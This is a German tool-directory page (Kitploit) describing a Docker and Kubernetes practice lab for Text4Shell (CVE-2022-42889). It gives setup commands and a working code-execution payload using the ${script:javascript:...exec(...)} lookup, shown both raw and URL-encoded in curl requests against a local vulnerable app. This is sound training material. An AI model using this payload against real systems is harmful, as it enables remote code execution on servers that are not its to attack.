Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
text4shell-cve-2022-42889 — Kubernetes-Labor für CVE-2022-42889 | Kitploit
Tools/GitHubGitHub/devenes/text4shell-cve-2022-42889
Container-SicherheitSchwachstellenanalyseWebanwendungs-ExploitationCloud-SicherheitLernen & BildungLabs & Praxis
GitHubdevenes/text4shell-cve-2022-42889

text4shell-cve-2022-42889

Kubernetes-Labor für CVE-2022-42889

Repository anzeigen
21vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Text4Shell CVE-2022-42889

Docker-Lab für CVE-2022-42889

Du kannst das Docker-Image entweder lokal erstellen oder das Image von Docker Hub pullen und den Container ausführen.

Repository klonen

root@kitploit:~
git clone https://github.com/devenes/text4shell-cve-2022-42889.git

Das Docker-Image lokal erstellen

root@kitploit:~
docker build --tag=text4shell .

Den Docker-Container ausführen

root@kitploit:~
docker run -d --rm -p 8080:8080 text4shell

Oder das Image von Docker Hub pullen und den Container ausführen

root@kitploit:~
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

Teste die App, indem du eine Zeichenkette an den Parameter search übergibst:

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>
  • Der Angriff kann durch Übergabe einer Zeichenkette ${prefix:name} durchgeführt werden, wobei das Präfix der zuvor erwähnte Lookup ist:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

Angriff mit curl:

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
  • Du kannst auch die Präfixe dns oder url ausprobieren

Container-ID abrufen

root@kitploit:~
docker container ls

In den Container wechseln

root@kitploit:~
docker exec -it <container_id> bash

Prüfen, ob der RCE-Angriff erfolgreich war

  • Du solltest eine Datei namens foo im Verzeichnis /tmp sehen:
root@kitploit:~
ls /tmp/

Du kannst den Container mit dem folgenden Befehl stoppen

root@kitploit:~
docker container stop <container_id>

Kubernetes-Lab für CVE-2022-42889

Wechsle in das Verzeichnis kubernetes und folge den Anweisungen in der Datei README.md.

root@kitploit:~
cd kubernetes

kind-Cluster erstellen

root@kitploit:~
kind create cluster --config kind-config.yaml

Die verwundbare App im Cluster bereitstellen

root@kitploit:~
kubectl apply -f deployment.yaml

Einen Dienst erstellen, um die App verfügbar zu machen

root@kitploit:~
kubectl apply -f service.yaml

Die verwundbare App mit curl angreifen

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

Den Pod-Namen mit kubectl get pods abrufen

root@kitploit:~
kubectl get pods

In den Pod mit kubectl exec wechseln

root@kitploit:~
kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash

Prüfen, ob der Angriff erfolgreich war

root@kitploit:~
ls /tmp/ | grep foo

Das ausführliche Tutorial findest du in meinem Udemy-Kurs hier


Referenzen:

  • https://github.com/karthikuj/cve-2022-42889-text4shell-docker
  • https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
  • https://unifiedguru.com/security-advisory-cve-2022-42889-text4shell-docker/
  • https://medium.com/mii-cybersec/cve-2022-42889-text4shell-vulnerability-17b703a48dcd
Tool herunterladen